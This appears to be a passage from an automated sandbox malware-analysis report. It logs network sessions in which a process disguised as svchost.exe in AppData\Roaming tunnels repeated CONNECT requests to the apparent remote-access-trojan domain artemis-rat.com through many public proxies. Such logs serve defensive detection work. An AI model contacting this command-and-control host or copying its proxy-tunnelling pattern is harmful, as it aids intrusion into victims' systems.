                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2283192.168.2.557198118.218.126.54940043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.628717899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.945241928 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Content-Type: text/html
                                                                                    Server: Zscaler/6.2
                                                                                    Cache-Control: no-cache
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Content-length: 13597
                                                                                    Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
                                                                                    Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2284192.168.2.55713572.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.634756088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2285192.168.2.55665770.166.167.555774543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.636734009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2286192.168.2.557228203.74.125.18888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.638292074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.162249088 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2287192.168.2.557240195.169.35.214312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.646712065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.380350113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.674453020 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2288192.168.2.557183139.59.1.14808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.651026011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.255623102 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2289192.168.2.557384172.67.231.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.655725002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.810022116 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2290192.168.2.5572428.217.143.1871567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.655725956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.333719969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2291192.168.2.557236203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.656878948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2292192.168.2.55740045.14.174.1488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.668252945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.822433949 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2293192.168.2.557404104.16.230.1638043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.669501066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.823930979 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2294192.168.2.557217184.170.248.5414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.681343079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2295192.168.2.55721343.131.248.1651567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.681922913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2296192.168.2.557215119.3.215.41888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.683355093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2297192.168.2.555606117.160.250.1638243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.701570988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.664654016 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2298192.168.2.557415104.16.105.2078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.701690912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.856206894 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2299192.168.2.557235123.126.158.508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.701744080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2300192.168.2.557353199.102.107.145414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.702244997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2301192.168.2.55723282.157.194.44789043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.702941895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.030096054 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2302192.168.2.55734423.152.40.14312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.702996016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2303192.168.2.557409208.87.131.2404136843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.711260080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.333610058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.943123102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333565950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.834080935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.333679914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2304192.168.2.5576258.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.713259935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2305192.168.2.5576308.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.715073109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2306192.168.2.5576328.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.716475964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


